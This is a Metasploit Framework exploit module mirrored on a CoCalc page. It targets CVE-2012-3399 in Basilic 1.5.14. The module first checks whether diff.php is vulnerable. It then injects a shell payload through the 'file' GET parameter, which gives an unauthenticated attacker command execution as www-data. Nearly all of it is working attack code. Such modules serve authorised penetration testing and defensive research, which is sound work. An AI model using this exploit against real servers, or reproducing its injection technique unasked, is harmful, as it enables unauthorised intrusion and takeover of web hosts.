CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/basilic_diff_exec.rb
Views: 11623
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',

14
      'Description'    => %q{

15
          This module abuses a metacharacter injection vulnerability in the

16
        diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary

17
        commands as the www-data user account.

18
      },

19
      'Author'         =>

20
        [

21
          'lcashdollar',

22
          'sinn3r',

23
          'juan vazquez'

24
        ],

25
      'License'        => MSF_LICENSE,

26
      'References'     =>

27
        [

28
          [ 'CVE', '2012-3399' ],

29
          [ 'OSVDB', '83719' ],

30
          [ 'BID', '54234' ]

31
        ],

32
      'Platform'       => %w{ linux unix },

33
      'Arch'           => ARCH_CMD,

34
      'Privileged'     => true,

35
      'Payload'        =>

36
        {

37
          'DisableNops' => true,

38
          'Compat'      =>

39
            {

40
              'PayloadType' => 'cmd',

41
              'RequiredCmd' => 'generic perl ruby python telnet'

42
            }

43
        },

44
      'Targets'        =>

45
        [

46
          [ 'Automatic Target', { }]

47
        ],

48
      'DefaultTarget'  => 0,

49
      'DisclosureDate' => '2012-06-28'

50
    ))

51


52
    register_options(

53
      [

54
        OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])

55
      ])

56
  end

57


58


59
  def check

60
    base = normalize_uri(target_uri.path)

61


62
    sig = rand_text_alpha(10)

63


64
    res = send_request_cgi({

65
      'uri'  => normalize_uri("/#{base}/Config/diff.php"),

66
      'vars_get' => {

67
        'file' => sig,

68
        'new'  => '1',

69
        'old'  => '2'

70
      }

71
    })

72


73
    if res and res.code == 200 and res.body =~ /#{sig}/

74
      return Exploit::CheckCode::Vulnerable

75
    end

76


77
    return Exploit::CheckCode::Safe

78
  end

79


80


81
  def exploit

82
    print_status("Sending GET request...")

83


84
    base = normalize_uri(target_uri.path)

85


86
    res = send_request_cgi({

87
        'uri' => normalize_uri("/#{base}/Config/diff.php"),

88
        'vars_get' => {

89
          'file' => "&#{payload.encoded} #",

90
          'new'  => '1',

91
          'old'  => '2'

92
        }

93
      })

94


95
    if res and res.code == 404 then

96
      print_error("404 Basilic not installed or possibly check URI Path.")

97
    else

98
      vprint_line("Server returned #{res.code}")

99
    end

100


101
    handler

102
  end

103
end

104


105